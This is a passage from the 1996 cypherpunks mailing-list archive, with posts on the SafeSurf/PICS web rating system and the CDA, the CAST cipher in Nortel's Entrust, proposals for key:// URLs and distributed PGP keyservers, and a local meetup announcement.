almost as unstable as email..

        Check out for more on these naming schemes.

   Linkname: WRL: Web: URXs
        URL: http://webreference.com/urx.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: cp850

iQCVAwUBMTcfaP0Ael7bLK1/AQG56QQAxr+Tii4UMytdQUXIrKzIp2ckY4UfbGqW
BpkduSxha0lL8Mo2kmzOL4Z3s4NiJMExvzUKOo6Y16MuCXhKgJyxH5VN+Nk1Y/ov
qNpm4zaFOiAFQTbjMhSWJgFGmm6uaHuOez5jZDpSCpZTSBbXUwR349lxXjEtuvy8
hm+w0ADr/VQ=
=SYWa
-----END PGP SIGNATURE-----
_______________________
Regards,            There is no point at which you can say, 'Well, I'm
		    successful now.  I might as well take a nap.' -Carrie Fisher
Joseph Reagle       http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 2 Mar 1996 11:17:00 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Paint Your Own Scarlet Letter (Was: Edited Edupage, 29 Feb 1996)
Message-ID: <199603020108.RAA20068@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>From EduPage via E. ALLEN SMITH:
>SELF-PATROLLING THE WEB
>The World Wide Web Consortium is pushing the Web page rating system that it
>developed in cooperation with the Platform for Internet Content Selection, a
>group of 22 online firms.

>From SafeSurf Rating Page via lmccarth@cs.umass.edu wrote:
>Thank you for making the Internet a safer place without censorship.
>Until later, SafeSurfing to you!

Remember, my goal is to convince the congress, president, courts, and
Americans in general that the government should not be in the censorship
business, not to have a system that actually works.  I really hope this
self rating system works in practice because (1) it is in line with current
Internet practice, and (2) having it work makes a one hell of a fine
argument.

For many years people on the Internet have been encouraged to provide
warnings on things they think others may find offensive.  The the use of
rot13 "encryption" is one example, another is the practice of putting
warning labels (advertisements?) on material.  Killfiles (in their most
general sense) are analogous to the censoring browsers in this system.

(I know it doesn't work for ftp/gopher/email/usenet newsgroups.  I hope
that the censors think that the web is the net.)

(I think I want to start a web search engine looking for pages rated
SS~~002 9, SS~~004 9, SS~~005 <5, and all the others don't care.)

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 2 Mar 1996 06:32:19 +0800
Subject: No Subject
Message-ID: <QQaffd09642.199603012219@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Jonathon Fletcher writes:
>   Can anyone tell me anything about a product called "Entrust", by Nortel
> (Northern Telecom). The notes talk about the software using DES ("which
> employs a 56-bit key") so I guess it's single DES, not triple DES. It also
> mentions a proprietary algorithm called CAST. 
> 
>   Is this worthy of further investigation, or is it suspect ? What is 
> CAST, and would it be classed as snake oil ?

I asked one of the NorTel sales reps. about this at the RSA conference. As
I recall, CAST is an espionage-enabled version of DES -- i.e. 16 of the key
bits are sent in the clear, or have a fixed value, or something along those
lines. The guy I spoke to didn't know the technical details.

Of course, maybe we should consider 56-bit DES espionage-enabled at this 
point too ! 

>   Please cc to me in mail

(done)

-Lewis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 2 Mar 1996 06:51:43 +0800
Subject: No Subject
Message-ID: <QQaffe12456.199603012234@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

PADGETT@hobbes.orl.mmc.com wrote:

> Next rage might well be "vanity" PGP keys. While at the moment it is not known
> how to create a specific match key to a sequence, if you generate enough
> keys, there will be some interesting sequences found. Possibly some PGP
> signatures will even be in violation of the CDA (now that should start a
> rush 8*).

Funny you should mention that, I noticed a strange message in my key the
other day ...


	Type bits/keyID    Date        User ID
	pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
	-----BEGIN PGP PUBLIC KEY BLOCK-----

	mQDKAjED/fgD6AEEANi8U98UJ/Wm3rxiZuPrkvLmOifV8y68MgdRnQQtQDsoGa0L
	OWjoH8yLTVEi8dKeU52Bdr0p+M2TaW8Z+0phW43P9mBaM2sw42vq1FyBxv0EjtEn
	8VbN6i7SC1+Xp4GsX9I8ctlN4y59gEcOFSHFCJjw9heRlM8Cq9M+30vAAdANAekB
	livXDe0T+PGPesUeMedaMliveDehT+PGPesUeMedaMliveDehT+PGPesUeMedaMl
	iveDehT+PGPes6eMA7QlR2FyeSBIb3dsYW5kIDxnYXJ5QGthbXBhaS5ldXJvbmV0
	Lm5sPokBFQIFEDED/i7oDjFwD/HBoQEB3K4H/icZoG0lE5pitriLdqqwNZB0kZiT
	yEnvhg1NqOZwCusHqzMV71S+vDfYYSrl7VjmCVaEOgPAT3kpc7ShXsWpFa4y9pXF
	AjBgR/9crcH98cbrIlGMArKKNiGITGq8tpKvAowyIaG6gn1W7XZRFd0hISrI1C3y
	j13JUFWyYLjNuA/tPiIfZ2h/HUu4LgFr2WhFn4/l3IVcGVLeCLK6Gv4dxd8HEt2d
	mGn7WAygarf7PQevHLIoxElwJkIea6necbgYx5p2GOUNW3/N478n3n6TT1jpu1pU
	RUGYRd5cGYc7z6gXb15FZw0z3uh4ybTEP4pOflBjBPJm27RcEYtuZxSuKQg=
	=Liso
	-----END PGP PUBLIC KEY BLOCK-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTcqiyoZzwIn1bdtAQHwaQF/ZBY9JZ6e6dgXjAORuRLQSbRY2JuZHGbN
1a69D0NwvRBdrB4iIjWCdwBQuhXXCd+K
=8nI2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 2 Mar 1996 06:54:51 +0800
Subject: No Subject
Message-ID: <QQaffe12932.199603012236@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


I have to thank everyone who helped me with using cypherpunk remailers!
Thank you very much..
I've got very much response on this so I have to thank you all in this
message!


Johan Sandberg





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 2 Mar 1996 07:03:59 +0800
Subject: No Subject
Message-ID: <QQafff14821.199603012250@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Mail*Link(r) SMTP               FWD> ADMIRAL WILLIAM O. STUDEMAN

Gee I guess we can trust these guys....

----


    CONCORD, Calif., Feb. 28 /PRNewswire/ -- Premenos Technology Corp.
(Nasdaq: PRMO), a leading provider of electronic data interchange (EDI)
software solutions for electronic commerce applications, today announced
the election of Admiral William O. Studeman, U.S. Navy-retired, to its
Board of Directors effective immediately. Studeman will also act as
consultant on special projects including security and encryption issues.
          Admiral Studeman, age 56, is the former Deputy Director of Central
Intelligence and served for five months in 1995 as the acting Director
of Central Intelligence. He retired from the Navy in October 1995. Prior
to his assignment at the Central Intelligence Agency (CIA), Studeman was
the Director of the National Security Agency (NSA), and before that was
the Director of Naval Intelligence. In these positions, Studeman was
involved in attempting to develop public policies and technologies that
addressed the complex and often conflicting issues of enhanced economic
competitiveness, law enforcement's warranted requirement for information
transparency in pursuit of criminal investigations, national security
interest in combating potential information warfare threats, and the
country's overall increased need for enhanced protection of its
information-related systems and applications.
          In commenting on his election to the Board of Premenos, Studeman
stated that "Premenos is not only a leader in facilitating the promising
future of electronic commerce, it is the first company in the
marketplace with a product line for enhanced protection, security and
integrity for the Internet and other electronic communications-related
business transactions." Studeman added, "In working with Lew Jenkins and
others in the company, I have an opportunity to better frame the
government-industry dialogue and define the infrastructure, standards,
regulatory, technical and other directional factors which must be
addressed for electronic commerce -- a rapidly evolving industry segment
so fundamental to the future of the American lifestyle and national
security."
          Lew Jenkins, chairman and founder of Premenos said, "The
infrastructure for moving critical business data over the Internet is
crucial to the success of electronic commerce. We welcome Admiral
Studeman to our team and look forward to his help in developing a
trusted model for the electronic commerce market and establishing a
solid infrastructure similar to the stringent military requirements that
have been in place for decades."
          About Premenos Corp.
          Premenos is setting the agenda for electronic commerce and EDI
through open networks such as the Internet. Premenos EDI software is an
enabling strategy for transforming how corporations conduct business in
extended enterprises using electronic communications. Templar -- a suite
of software and services that enable businesses to send and receive EDI
documents securely and reliably over the Internet -- was awarded the
EMA '95 Electronic Commerce Product Excellence Award recognizing the
most innovative new product debuted at EMA's annual conference. Premenos
products support the IBM AS/400, RISC System/6000, HP 9000, SunSparc,
Windows 3.x, NT and Windows 95. Premenos has a worldwide presence with
sales offices in California, London and Paris. Contact Premenos World
Wide Web (WWW) home page at http://www.premenos.com to access over
3000 pages of information on electronic commerce, EDI, standards, as
well as Premenos corporate information materials.
          NOTE:  Premenos is a registered trademark of Premenos Corp. All
other product and company names are trademarks of their respective
corporations.
      CO:  Premenos Technology Corp.
      ST:  California
      IN:  CPR
      SU:  PER









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 3 Mar 1996 16:59:07 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 29 Feb 1996
Message-ID: <01I1U06TWSP2AKTQC0@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu"  1-MAR-1996 00:53:05.93

>*****************************************************************
>Edupage, 29 February 1996.  Edupage, a summary of news items on information
>technology, is provided three times each week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>*****************************************************************

	The below has some relevance for the discussion on firewalls vs
encryption. It seems to give evidence for the needed solution being either
firewalls and encryption (external _and_ internal) or encryption alone.

>NO SAFETY ON THE NET
>A recent survey of businesses found nearly one in four are staying away from
>the Internet because they worry about electronic security breaches.  For
>instance, Merrill Lynch refuses to use the Net for any "value-bearing"
>business and has doubts about allowing customers to link up via the
>Internet.  Meanwhile, if your company uses an Intranet, you're not immune to
>security problems -- experts estimate that as much as 80% of all security
>losses are committed by company insiders.  The technical staff manager at
>Bell Labs notes:  "Our firewall keeps the bad guys out.  But you can't say
>there aren't bad guys inside the company."  (Information Week 19 Feb 96 p34)

	The below is worrisome; I am willing to bet that the European
governments might try to require it, and that the US might follow suit if the
CDA gets tossed out (analogous to the V-chip). I'll send a further message
after I've analyzed the rating system in question a bit more.

>SELF-PATROLLING THE WEB
>The World Wide Web Consortium is pushing the Web page rating system that it
>developed in cooperation with the Platform for Internet Content Selection, a
>group of 22 online firms.  Operators at about 20,000 Web sites have already
>coded themselves using the Internet Relay System, which is similar to the
>rating system for films.  To rate your Web site, go to the SafeSurf site at
>< http://www.safesurf.com/ > and fill out the form that helps them come up
>with a rating.  PICS members plan to pitch the system to European
>governments in an effort to avoid continental content restrictions.
>(Investor's Business Daily 28 Feb 96 A6)

>Edupage is written by John Gehl (gehl@educom.edu) & Suzanne Douglas
>(douglas@educom.edu).  Voice:  404-371-1853, Fax: 404-371-8057.  

>Technical support is provided by the Office of Information Technology,
>University of North Carolina at Chapel Hill.

>***************************************************************
>EDUPAGE is what you've just finished reading.  To subscribe to Edupage: send
>a message to: listproc@educom.unc.edu and in the body of the message type:
>subscribe edupage Thomas Alva Edison (assuming that your name is Thomas Alva
>Edison;  if it's not, substitute your own name).  ...  To cancel, send a
>message to: listproc@educom.unc.edu and in the body of the message type:
>unsubscribe edupage.   (Subscription problems?  Send mail to
>educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 2 Mar 1996 10:29:55 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Edited Edupage, 29 Feb 1996
In-Reply-To: <01I1U06TWSP2AKTQC0@mbcl.rutgers.edu>
Message-ID: <9603012357.AA27392@alpha>
MIME-Version: 1.0
Content-Type: text/plain



E. ALLEN SMITH writes:
 > The below is worrisome; I am willing to bet that the European
 > governments might try to require it, and that the US might follow suit if the
 > CDA gets tossed out (analogous to the V-chip). I'll send a further message
 > after I've analyzed the rating system in question a bit more.

Require it?  Of whom?  

What will all these people do the day somebody implements a new
web-like internet protocol and makes a daemon available for free
anonymous download?  There seems to be some kind of wierd idea
floating around that all we need to do is to "rate those web pages".

Anyway, I don't know what more needs to be said about a rating system
other than that it's a rating system.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 2 Mar 1996 07:16:39 +0800
Subject: No Subject
Message-ID: <QQaffg16863.199603012302@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


The database size is really only half the problem I think.  The bigger
problem is managing the database.  I can't quite see it being possible to
have one organization serve as a distribution point for all keys. With
millions of billions of certs, you're going to have having thousands or
millions of database updates on a daily basis.

It does seem though that if you can truly eliminate revocations then things
get a lot easier.  You never have to go back a check with the issuer about
anything. This will probably work for some applications, but there's
certainly others for which it won't.

LL

At 2:21 PM 2/29/96, Carl Ellison wrote:
>At 12:01 2/29/96, Laurence Lundblade wrote:
>>I think a problem occurs when you have 20 billion of
>>these certs (two for every person in the year 2010 or such).  A simple hash
>>into a table isn't going to cut it because you a single database (with
>>replication?) isn't going to be possible.
>
>BTW, at the rate that memory gets cheaper and smaller, it might be quite
>reasonable to have that single database fit alongside your daily appointments
>in your shirt-pocket daily organizer and e-mail terminal, in 2010.
>
>
>+--------------------------------------------------------------------------+
>|Carl M. Ellison          cme@cybercash.com   http://www.clark.net/pub/cme |
>|CyberCash, Inc., Suite 430                   http://www.cybercash.com/    |
>|2100 Reston Parkway           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
>|Reston, VA 22091      Tel: (703) 620-4200                                 |
>+--------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 2 Mar 1996 07:24:59 +0800
Subject: No Subject
Message-ID: <QQaffg18846.199603012314@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


   3-1-96. TWP:

   "Expert Panel Wants Intelligence Director to Hold More
   Power."

      The commission finds that the patchwork of 14 separate
      intelligence agencies is functioning well in its current
      form. To meet tbe growing threat of worldwide criminal
      activity the panel suggested creation of a high-level
      policy group run out of the White House, called tbe
      Global Crime Committee. It would be chaired by the
      president's national security adviser and would include
      the AG, State, DoD, and the DCI.

   "Turner: CIA Nearly Used A Journalist in Tehran."

      CIA's covert operators do not want to reopen the debate.
      As Turner put it, "Is the media case stronger than
      businessmen or academics? The covert operators are
      worried that we may reach a point where prohibitions
      will get us down to where there is nobody left to spy
      but the Foreign Service."

   3-1-96. NYT:

   "Commission Recommends Streamlined Spy Agencies."

      Most of the changes the report will recommend are
      evolutionary, not revolutionary. Intelligence officials
      used the same word to describe it: "underwhelming." The
      report fails to answer the big overstaffing problem. An
      official said the resistance within the intelligence
      agencies to staff cutting would be so strong that the
      downsizing would never happen.

   MAF_ios











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Tue, 5 Mar 1996 03:39:33 +0800
Subject: No Subject
Message-ID: <QQaffg18870.199603012314@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
> 
> In suggesting key:// urls, I (without commenting) placed a path of
> /s/telnetd/ in a URL.  I was considering that a telnetd might need
> many keys and associated documents, all of which could be found in a
> directory.
> 
> 	gateway's master telnetd public key.
> 	daily keys
> 	policy statements about who may connect, or how
> 	etc
> 
> I expect that we could extend the syntax in such a way that a URL
> could contain most of the data we need.  Thus, the default document
> might be a 'cert of the day,' with possibly with references within the
> certificate to the master telnetd key, the hosts master key.
> 
> 	To expand, I was thinking of:
> 
> 	key://foo.bar.com/{u,s,h,d}/family/instance


While that would be useful in a lot of cases, I would hope that
all that path gunk wouldn't be required.... most people would
have one key, at least initially, and so a simple

key://foo.bar.com/username/key.asc

would be enough for them.  I wouldn't want to prevent people
from using your system, in fact it's a good idea.  I just don't think
that it should be required, just recommended.

Something else to add would be a specifier for the type of key, i.e.

key://slack.lne.com/pgp/ericm/key.asc

The reason for the keytype specifier is obvious, so that the
system can support more than just PGP keys.  The problem with
the above example is that the 'pgp' part is imbedded in the path.
Since the apps that read these key URLS need to know which ones
are for PGP and which for DH or DSS or whatever, the keytype
specifier needs to be in a standard location in the URL.

Suggestions?  maybe key:/pgp/slack.lne.com/ericm/key/asc?
 

Finally, a question:  should the keyserver be able to serve
keys in a way that is secure from a MITM attack, or can it depend
on the certificate chain in the key certificate itself to
validate the key certificate?  I think it can, but I am not
sure, so perhaps someone smarter than I can explain why, or why not.

The attraction is obvious, if the key server doesn't have to
validate the keys it serves, the whole problem of distributed
key servers becomes much easier.



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: platypus@alpha.c2.org (The Warm-Blooded One)
Date: Sat, 2 Mar 1996 12:09:46 +0800
To: cypherpunks@toad.com
Subject: Anyone else getting duplicate ACKs sending alpha.c2.org messages?
Message-ID: <199603020231.SAA04039@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I just started a couple days ago, so it's entirely possible that I'm doing something wrong, but I seem to be getting two acknowledgement messages, about 5 minutes apart, for the last four messages (which happen to be my first four messages) sent through alias@alpha.c2.org. The recipient only seems to be getting one copy of the message. I happen to be using Private Idaho (thanks Joel!), but I don't think it should matter.

Just wanted to check whether this was a common experience before troubleshooting more or bugging Sameer (yeah, so I go and bug EVERYBODY instead).

I was going to figure it out myself, but since I'm bugging you anyway, is there a decent newbie guide on the web for using the
mail-news gateways that parse the Newsgroups: header? I gather you just add the header after a ::, but do you just add headers, or repeat them all?

I am mostly just educating myself and playing around with this stuff at the moment, so don't waste your time giving me a detailed reply on the assumption that I'm an Australian political dissident or anything.
-- 
platypus@alpha.c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 2 Mar 1996 07:46:41 +0800
Subject: No Subject
Message-ID: <QQaffi21893.199603012335@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


I think we are in violent agreement here...

> I disagree but then my worldview is different. For personal use the
> compact distributed system is workable however when you start thinking
> in terms of a large distributed organization, the quanta changes.
> 
> Mention was made of the difficulty of handling 20,000 keys. I am looking at
> over 80,000 today and over 200,000 tomorrow *for a single organization*. For
> quantities like this, a hierarchial system of management seems inevitable.

Perhaps you misunderstood what I mean by "central keyserver model".
What I mean by that is the status quo, where we have a set of central
keyservers and each keyserver knows about each key.  When I say that
this will disappear, I mean that we will move towards a more
distributed system, similar to the DNS for looking up hostnames.  Yes,
we will need a distributed, hierarchial [sic] system in the future,
and if we want to continue using PGP we will need to provide a simpler
way to use that.

> First, I am not about to give up my personal PGP key, it is trustworthy and
> effective for my needs. It is not necessarily incompatable with an 
> organizational structure.

This is true.

> However *for the organization* something else is needed. I can see a 
> future in which the bulk of the population has only two keys: their own
> and the punlic key of their post office (not talking USNail - private ones
> though not saying the US might not operate one as well).

I disagree.  I know the addresses of the people with whom I
communicate regularly.  I know my parent's USnail address, my
grandparents', my SO's, etc.  I dont need to tell the Post Office
"Send this to my parents" and trust them to do it.  I give them a
destination address and trust them to send it to the proper
destination.  The same thing is true in the electronic world.  I put a
destination on the email, give it to the mailer, and trust it to send
it to the appropriate destination.

A similar anology can be made when I dont know an address: I ask
someone for it.  Same thing with an email address/PGP key, I need to
ask for it before I can use it.

The same thing is true of hostnames.  I can find a hostname<->IP
address for just about any host on the planet.  Do I have them all on
my local disk?  No, of course not.  I look them up when I need them.
However, I do cache local copies of the names I frequently use.

> As noted, a hierarchal mechanism will be needed for key retrieval -
> only local keys and "frequent fliers" will be kept locally. Not new
> concept, just not used by post offices that I know of today.

Yes, this is true.  And it is used -- its called regional phone books.
If I want to get a number for someone, I go to the regional phone book
and look them up.  I have to know something about them first, so I
know where to look.  If I asked you to find the machine
"incommunicado" and tell me it's IP address, what would you do?  You'd
have to look in every domain for machines named "incommunicado".
However, if you knew that I meant "in the 'ihtfp.org' domain", you'd
know exactly where to look.  The same is true of phone numbers.  The
same is true for keys.

> Will need a bit of fleshing out and expect the end-state to be 2-4 years out
> but is a good time to think about it.

True.  The problem is that with PGP messages, the only information
about keys is a "random" keyID.  From a keyID there is no way to
determine that key unless you already have it.  This means that if you
do not already have the key, you have no way to find that key.  See
the problem?  This is like the "find 'incommunicado'" problem above.

What I propose is to modify, slightly, the PGP signature certificate
to add a "hint" field.  This hint field would tell you where to look
for the key.  This is the way to add the "ihtfp.org" info to the
PGP signature.

I hope this clears up any misconceptions...

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Mon, 4 Mar 1996 01:20:22 +0800
Subject: No Subject
Message-ID: <QQaffi21892.199603012335@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



Applied Crypto 2nd Edition - page 334-335.
 
Brief stuff:
Block Cypher (symetrical), 64 bit key, 64 bit block size
"The S-boxes are implemenation dependent, but not key dependent."
resistant to differential and linear cryptanalysis
   "Northern Telecom is using CAST in their Entrust security
    software package for Macintoshes, PCs, and UNIX workstations.
    The particular S-boxes they chose are not public.  The
    Candadian government is evaluating CAST as a new encryption
    standard.  CAST is patent pending."
 
If you don't have the book - GET IT!  ;-)
 
Dan
 
> From: "Stephen A. Gutknecht" <sgutknec@computek.net>
> To: "'cypherpunks@toad.com'" <cypherpunks@toad.com>
> Subject: RE: Nortel "Entrust"
>
> I too would like to see an open discussion on this.  Microsoft uses this for 
> their new Exchange Server client/server email product....
>
> ----------
> From:         Jonathon Fletcher[SMTP:jonathon@japan.sbi.com]
> Sent:         Friday, March 01, 1996 10:17 AM
> To:   cypherpunks@toad.com
> Subject:      Nortel "Entrust"
>
>
>   Can anyone tell me anything about a product called "Entrust", by Nortel
> (Northern Telecom). The notes talk about the software using DES ("which
> employs a 56-bit key") so I guess it's single DES, not triple DES. It also
> mentions a proprietary algorithm called CAST.
>
>   Is this worthy of further investigation, or is it suspect ? What is
> CAST, and would it be classed as snake oil ?
>
 
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 2 Mar 1996 07:57:09 +0800
Subject: No Subject
Message-ID: <QQaffj23137.199603012345@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Where can I find it? Please send ftp or URL via private E-Mail.

(define(RSA m e n)(list->string(u(r(s(string->list m))e n))))(define(u a)(if(>
a 0)(cons(integer->char(modulo a 256))(u(quotient a 256)))'()))(define(s a)(if
(null? a)0(+(char->integer(car a))(* 256(s(cdr a))))))(define(r a x n)(cond((=
0 x)1)((even? x)(modulo(expt(r a(/ x 2)n)2)n))(#t(modulo(* a(r a(1- x)n))n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sat, 2 Mar 1996 10:29:51 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Paint Your Own Scarlet Letter (Was: Edited Edupage, 29 Feb 1996)
In-Reply-To: <01I1U06TWSP2AKTQC0@mbcl.rutgers.edu>
Message-ID: <199603012351.SAA21083@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From EduPage via E. ALLEN SMITH:
> >SELF-PATROLLING THE WEB
> >The World Wide Web Consortium is pushing the Web page rating system that it
> >developed in cooperation with the Platform for Internet Content Selection, a
> >group of 22 online firms.  Operators at about 20,000 Web sites have already
> >coded themselves using the Internet Relay System, which is similar to the
> >rating system for films.  To rate your Web site, go to the SafeSurf site at
> >< http://www.safesurf.com/ > and fill out the form that helps them come up
> >with a rating.  

I couldn't resist the temptation. I rushed out and rated my home page
as evil incarnate, at least according to
the SafeSurf rating system. No innocent rugrats are gonna be learning
anything about my work in crypto and symbolic computation on the web !

It's, uh, interesting to note that "homosexual themes" gets a whole
separate category from "heterosexual themes". :[

Here's the reply I received after filling out the SafeSurf web form. It looks
as though anyone can use the code below by sticking it in their HTML as
directed:

--- begin included message ---

>To: lmccarth@cs.umass.edu
>From: SafeSurf Rating Page
>Subject: Rating your site with the SafeSurf System
____________________________________________________________
01_Site = www.cs.umass.edu/~lmccarth/ 
Email_Address = lmccarth@cs.umass.edu 
(SS~~000)  Recommended Age = 9. Explicitly for Adults 
(SS~~001)  Profanity = 9. Explicit and Crude 
(SS~~002)  Heterosexual Themes = 9. Explicit and Crude or Explicitly Inviting Participation 
(SS~~003)  Homosexual Themes = 9. Explicit and Crude or Explicitly Inviting Participation 
(SS~~004)  Nudity = 9. Explicit and Crude 
(SS~~005)  Violence = 9. Encouraging Personal Participation, Weapon Making 
(SS~~006)  Sex Violence and Profanity = 9. Explicit and Crude 
(SS~~007)  Intolerance = 9. Advocating Violent or Hateful Action 
(SS~~008)  Drug Use = 9. Soliciting Personal Participation 
(SS~~009)  Other Adult Themes = 9. Explicit and Crude or Explicitly Inviting Participation 
(SS~~00A)  Gambling = 9. Providing Means with Stakes 
____________________________________________________________

The following code should be placed directly after the <HEAD> statement of your HTML document:

<META http-equiv="PICS-Label" content='(PICS 1.0 "http://www.classify.org/safesurf/" l r (SS~~000 9 SS~~001 9 SS~~002 9 SS~~003 9 SS~~004 9 SS~~005 9 SS~~006 9 SS~~007 9 SS~~008 9 SS~~009 9 SS~~00A 9 SS~~100 1))'>

____________________________________________________________
 
Here's an example of how to place the code in your HTML document: 
<HTML> 
<HEAD> 
<META http-equiv="PICS-Label" content='(PICS 1.0 "http://www.classify.org/safesurf/" l r (SS~~000 9 SS~~001 9 SS~~002 9 SS~~003 9 SS~~004 9 SS~~005 9 SS~~006 9 SS~~007 9 SS~~008 9 SS~~009 9 SS~~00A 9 SS~~100 1))'> 
<TITLE> Your Web Page Title </TITLE> </HEAD>
<BODY> 
--- Your Content Begins here -- 
____________________________________________________________
Thank you for making the Internet a safer place without censorship.
Until later, SafeSurfing to you!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 2 Mar 1996 08:06:41 +0800
Subject: No Subject
Message-ID: <QQaffj24602.199603012355@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Here is your friendly reminder of the Austin Cypherpunks meeting
tomorrow, Saturday the 2nd.  We'll meet at the Central Market Cafe at
38th and Lamar at 6PM.  Topics include the video (I'll have a
camera!), ITAR relaxation, RC4 now being called PC1, how to duck the
CDA using crypto, hardware random number generators, and stuff like
that.  The meeting should go around 2 hours depending on the crowd,
and there is a Bookstop next door if you want to browse some reading
material later.

Look for the people with technical books and/or crypto-related shirts.
They will be us.

(I'm sending this to both austin-cpunks and cypherpunks.)
-- 
Ben Combee, CAD Software Developer, small language enthusiast, HTML dude
Motorola, Paging Products Group, Strategic Semiconductor Operation--Austin
E-mail: combee@sso-austin.sps.mot.com   Phone: (512) 891-7141




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: willer@carolian.com (Steve Willer)
Date: Sat, 2 Mar 1996 08:35:29 +0800
To: cypherpunks@toad.com
Subject: Re: PGP to PC mail integration
In-Reply-To: <01I1SHIHFEBKAKTPB8@mbcl.rutgers.edu>
Message-ID: <31374977.245533825@saturn>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 29 Feb 1996 15:50 EDT, you wrote:

>	You'd put something into the mail message itself that would tell it
>"don't encrypt this" and/or "don't sign this". Hmm... you'd need to put in
>messages to be signed and/or encrypted your passphrase, or have it gotten some
>other way... which doesn't look very safe.

Not very user-friendly either.

>An attacker could still potentially slip
>something in between the mail program and the proxy program, though - the same
>problem as with the passphrase in the message. 

Usually the proxy would be on the same machine as the mail program (i.e. "your
machine"). That would mean the "attack proxy" would have to be installed on the
user's PC, and if someone has that kind of access to your machine, their secret
keyring is vulnerable anyway.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sat, 2 Mar 1996 10:57:19 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Certificate validity issues
In-Reply-To: <Pine.SUN.3.91.960301102921.15925A-100000@rwd.goucher.edu>
Message-ID: <199603020030.TAA22084@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


some hairboy ;) writes:
> I don't see any that there could be any sort of automatic way to 
> distinguish between the necessity for recipient-signed vs. 
> recipient-unsigned certificates; One would assume that recipient-unsigned 
> certificates would be effective only when issued from a high-reputation 
> source.
> 
> Some method should be required to allow user decisions as to this, but 
> whatever system is designed should definitely allow for both types, and 
> *require* relevant software to handle both types.

I think this is a policy issue, not a technology issue. In general, key
